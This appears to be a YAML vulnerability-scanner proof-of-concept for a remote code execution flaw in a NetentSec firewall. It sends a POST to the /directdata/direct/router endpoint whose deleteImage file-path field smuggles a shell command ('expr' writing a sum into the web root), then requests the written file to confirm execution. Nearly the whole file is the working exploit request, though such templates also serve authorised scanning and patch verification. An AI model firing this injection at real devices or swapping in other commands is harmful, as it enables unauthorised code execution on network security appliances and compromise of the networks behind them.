name: poc-yaml-netentsec-ngfw-rce
set:
  r1: randomLowercase(4)
  r2: randomLowercase(4)
  r3: randomInt(800000000, 1000000000)
  r4: randomInt(800000000, 1000000000)
rules:
  - method: POST
    path: /directdata/direct/router
    body: {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
    expression: response.status == 200
  - method: GET
    path: /{{r2}}
    expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4)))
detail:
  author: jingling(https://github.com/shmilylty)
  links:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g